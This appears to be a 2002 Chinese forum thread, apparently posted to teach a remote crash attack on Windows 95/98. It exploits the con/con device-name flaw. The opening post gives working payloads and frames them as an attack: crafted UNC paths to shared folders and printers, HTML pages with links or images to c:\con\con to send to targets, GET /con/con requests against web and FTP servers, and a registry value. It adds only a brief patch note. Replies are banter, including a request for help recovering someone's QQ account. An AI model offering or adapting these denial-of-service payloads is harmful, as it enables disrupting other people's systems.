淮聊首页 论坛首页 全部版面 焦点话题 论坛热帖 今日新帖 论坛搜索 论坛指南 聊天室 用户注册 登录  
  您的位置: 淮聊 >> 论坛 >> 学习园地 >> 软硬兼施 >> 查看贴子
  上篇 刷新 下篇  
 主题:共享炸法
号码:155832
呢称:
党委书记
等级:0
积分:757
主题:131
回复:515
注册:2002/2/3 9:11:18
发表:2002/7/22 16:19:02 人气:130 楼主
共享炸法

一、原理。
  共享炸法利用的是Windows9X的设备名称解析漏洞。Windows 9X 的 /con/con
设备名称解析漏洞允许用户远程攻击,导致windows98系统崩溃。请求访问系统上一些包含设备名的非法路径,这将导致windows9x崩溃。当windows解析这些路径时,内核的溢出导致整个系统出错。这时你只有重新启动系统才能恢复正常,没有其它的选择。发现有五个设备或设备驱动程序可以使系统崩溃。它们是:CON、NUL、AUX、CLOCK$、CONFIG$,其它的设备如
LPTx和COMx 则不行。把这些组合起来形成一个路径,如: CON\NUL, NUL\CON,
AUX\NUL,只要请求成功,windows系统将崩溃。
  二、操作。
  (1)如果目标机器上存在共享,不管该共享资源有没有设置密码,都可以用这个办法使系统死机:比如机器192.168.0.2上有一个名称为d的共享,则在"运行"中输入下面的命令可以使目标windows9x系统崩溃:
\\192.168.0.2\d\nul\nul。在网上有大量的windows95/98的机器,其打印机共享是打开的。这个共享是入侵windows95/98的入口,通常它对应
c:\windows\system属于只读共享。这种攻击方式对这类机器是很有效的:\\192.168.0.2\printer$\nul\nul

  (2) 制作包含下列HTML代码的一个网页,通过邮件方式(outlook)或者浏览器设法让攻击目标打开

<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
 (3) 如果攻击目标上安装了web server,如Microsoft Person web server,或者Frontpage
Extention Server,用:"Get /con/con" 或者 "Get nul/nul" 的请求,就可以远程当掉
windows 系统,比如:http://***.***.***.***/nul/nul 如果目标上安装了FTP
server,也可以使用上述 GET 命令来达到目的。
(4) 在注册表的: Inserting
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\_ 项,用
c:\con\con "%1" %* or c:\nul\nul "%1" %* 的值,也可以使系统当机。这是宏病毒的一种常用攻击方式。
(5)下面的HTML代码也可以达到目的:
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>

以上的情况只适用于IE浏览器。 
  三、解决办法。
  (1)安装微软对此发布的补丁。
(2)升级你的系统到WindowsMe或Win2000
  四、注意事项。
   此法破坏力极大,轻则TCP/IP栈堆崩溃,系统重启,重则只有重装系统,而且防火墙也拦不住。在使用的时候,自己的Win9x系统最好也装上补丁,因为你的机子也可能会死机。最好使用WindowMe或Win2000进行操作。
 
号码:159303
呢称:
我不哭
等级:0
积分:515
主题:96
回复:673
注册:2002/3/21 17:31:13
发表:2002/7/22 17:20:45 第1楼
Re 共享炸法

开除你的党籍。
 
-----------------------------------------------------------
因为梦见你离开,我从哭泣中醒来,看夜风吹过窗台,你能否感受我的爱。
号码:154121
呢称:
没票请上车
等级:0
积分:360
主题:63
回复:361
注册:2002/1/6 15:12:12
发表:2002/7/22 17:24:46 第2楼
Re Re 共享炸法

能不能帮我把我的QQ要回来?这些你以后慢慢教我
我的QQ75700554
 
-----------------------------------------------------------
是美女的(你认为你是美女的话)
你最好不要和我聊因为我对你没有多大希望我们也没有什么话可以聊的知道吗?
号码:110077
呢称:

等级:0
积分:430
主题:83
回复:572
注册:2000/12/28 15:56:58
发表:2002/7/22 17:50:13 第3楼
Re Re Re 共享炸法

  什么时间教我,我帮你如国民党~
 
-----------------------------------------------------------
我是蛇,我不再是你们的朋友`忘记我? <img src=
http://ecard.163.net/ecard/images/card_2_01_000_s.swf>


号码:155832
呢称:
党委书记
等级:0
积分:757
主题:131
回复:515
注册:2002/2/3 9:11:18
发表:2002/7/22 18:10:41 第4楼
Re Re Re Re 共享炸法

想学黑客啊??
去鹰派啊!!!
 
 本主题共有回复 4 个 本页: 1 -- 4  首页 上页 下页 尾页 切换论坛至:  
  快速回复 注意: *为必填项
 用户号码   请先登录,如果还未注册,请先注册成为新用户!
 帖子标题*   长度不得超过100字
 内容(最大16K)*  
 其它选项   显示签名    Alt+S快速提交
Copyright© 1999-2025 E-mail:zzz000ggg@sina.com 版权所有 苏ICP备05001972号|法律顾问